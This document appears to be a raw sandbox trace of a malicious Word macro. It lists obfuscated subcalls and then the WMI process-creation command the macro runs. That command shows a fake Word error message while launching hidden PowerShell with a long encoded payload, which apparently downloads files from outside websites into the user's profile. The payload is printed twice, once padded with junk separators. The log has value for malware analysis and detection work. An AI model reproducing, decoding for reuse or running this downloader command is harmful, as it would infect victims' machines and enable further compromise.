Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
rJEkbLH
Close
vEBqHrDnD
tWcKo
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
LzxxRHG
Close
EKezHIC
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
DpYbmDA
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
hDJDJ
Close
dXiwA
CreateObject	CreateObject("winmgmts:win32_process")
hFSyAfFrF
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
hXxQDACJA
Close
xkQqDXCcD
Mid
Len	Len("\x01 ]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAB]anw[3zAF]anw[3YAI]anw[3AAg]anw[3ACg]anw[3AIg]anw[3BLA]anw[3CIA]anw[3KwA]anw[3iAD]anw[3QAN]anw[3wBk]anw[3ACI]anw[3AKQ]anw[3AgA]anw[3CAA]anw[3KAB]anw[3bAH]anw[3QAW]anw[3QBQ]anw[3AGU]anw[3AXQ]anw[3AoA]anw[3CIA]anw[3ewA]anw[30AH]anw[30Ae]anw[3wAx]anw[3AH0]anw[3Aew]anw[3AwA]anw[3H0A]anw[3ewA]anw[3zAH]anw[30Ae]anw[3wAy]anw[3AH0]anw[3AIg]anw[3AtA]anw[3EYA]anw[3JwB]anw[3zAC]anw[3cAL]anw[3AAn]anw[3AHk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3jAF]anw[3QAb]anw[3wBy]anw[3AFk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3VAB]anw[3FAG]anw[30AL]anw[3gBJ]anw[3AG8]anw[3ALg]anw[3BEA]anw[3EkA]anw[3cgA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3ACc]anw[3AKQ]anw[3ApA]anw[3CAA]anw[3IAA]anw[37AC]anw[3AAI]anw[3AAg]anw[3ACA]anw[3AJA]anw[3BXA]anw[3GkA]anw[3OAA]anw[3gAD]anw[30AW]anw[3wB0]anw[3AHk]anw[3AUA]anw[3BlA]anw[3F0A]anw[3KAA]anw[3iAH]anw[3sAM]anw[3gB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3ANA]anw[3B9A]anw[3HsA]anw[3NgB]anw[39AH]anw[3sAN]anw[3QB9]anw[3AHs]anw[3AOA]anw[3B9A]anw[3HsA]anw[3MAB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BnA]anw[3EUA]anw[3UgA]anw[3nAC]anw[3wAJ]anw[3wAu]anw[3AE4]anw[3AZQ]anw[3B0A]anw[3C4A]anw[3UwB]anw[3FAF]anw[3IAV]anw[3gAn]anw[3ACw]anw[3AJw]anw[3BTA]anw[3FkA]anw[3cwA]anw[3nAC]anw[3wAJ]anw[3wBU]anw[3AGU]anw[3AJw]anw[3AsA]anw[3CcA]anw[3SQA]anw[3nAC]anw[3wAJ]anw[3wB0]anw[3AG0]anw[3AQQ]anw[3AnA]anw[3CwA]anw[3JwB]anw[3DAG]anw[3UAU]anw[3ABP]anw[3AEk]anw[3ATg]anw[3AnA]anw[3CwA]anw[3JwB]anw[3tAC]anw[3cAL]anw[3AAn]anw[3AE4]anw[3AYQ]anw[3AnA]anw[3CkA]anw[3IAA]anw[37AC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3AGk]anw[3AbA]anw[3BlA]anw[3G4A]anw[3dAA]anw[3nAC]anw[3sAJ]anw[3wBs]anw[3AHk]anw[3AJw]anw[3ApA]anw[3CsA]anw[3JwB]anw[3DAC]anw[3cAK]anw[3wAo]anw[3ACc]anw[3Abw]anw[3BuA]anw[3CcA]anw[3KwA]anw[3nAH]anw[3QAa]anw[3QAn]anw[3ACk]anw[3AKw]anw[3AnA]anw[3G4A]anw[3JwA]anw[3rAC]anw[3cAd]anw[3QBl]anw[3ACc]anw[3AKQ]anw[3A7A]anw[3CQA]anw[3TwB]anw[3sAD]anw[3kAb]anw[3wBu]anw[3AGs]anw[3AaQ]anw[3A9A]anw[3CQA]anw[3QwA]anw[3wAD]anw[3IAV]anw[3wAg]anw[3ACs]anw[3AIA]anw[3BbA]anw[3GMA]anw[3aAB]anw[3hAH]anw[3IAX]anw[3QAo]anw[3ADY]anw[3ANA]anw[3ApA]anw[3CAA]anw[3KwA]anw[3gAC]anw[3QAQ]anw[3QAw]anw[3ADM]anw[3AUA]anw[3A7A]anw[3CQA]anw[3SAA]anw[3yAD]anw[3cAW]anw[3AA9]anw[3ACg]anw[3AJw]anw[3BJA]anw[3CcA]anw[3KwA]anw[3oAC]anw[3cAN]anw[3gAn]anw[3ACs]anw[3AJw]anw[3A3A]anw[3FEA]anw[3JwA]anw[3pAC]anw[3kAO]anw[3wAg]anw[3ACA]anw[3AKA]anw[3BnA]anw[3GkA]anw[3IAA]anw[3oAC]anw[3IAV]anw[3gBh]anw[3AFI]anw[3AIg]anw[3ArA]anw[3CIA]anw[3aQB]anw[3BAE]anw[3IAT]anw[3ABl]anw[3ADo]anw[3Aaw]anw[3AiA]anw[3CsA]anw[3IgA]anw[30AD]anw[3cAZ]anw[3AAi]anw[3ACk]anw[3AIA]anw[3AgA]anw[3CkA]anw[3LgB]anw[32AG]anw[3EAT]anw[3AB1]anw[3AGU]anw[3AOg]anw[3A6A]anw[3CIA]anw[3QwB]anw[3yAE]anw[3UAY]anw[3ABB]anw[3AGA]anw[3AVA]anw[3BgA]anw[3EUA]anw[3RAB]anw[3JAF]anw[3IAZ]anw[3QBD]anw[3AFQ]anw[3AYA]anw[3BPA]anw[3FIA]anw[3eQA]anw[3iAC]anw[3gAJ]anw[3ABI]anw[3AE8]anw[3ATQ]anw[3BFA]anw[3CAA]anw[3KwA]anw[3) -> 17689
lBenBDA
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
UavHTIBHo
Close
IcAHwPH
BNmrm
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
FLtYjKHC
Close
qAUhkIMz
Create	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJ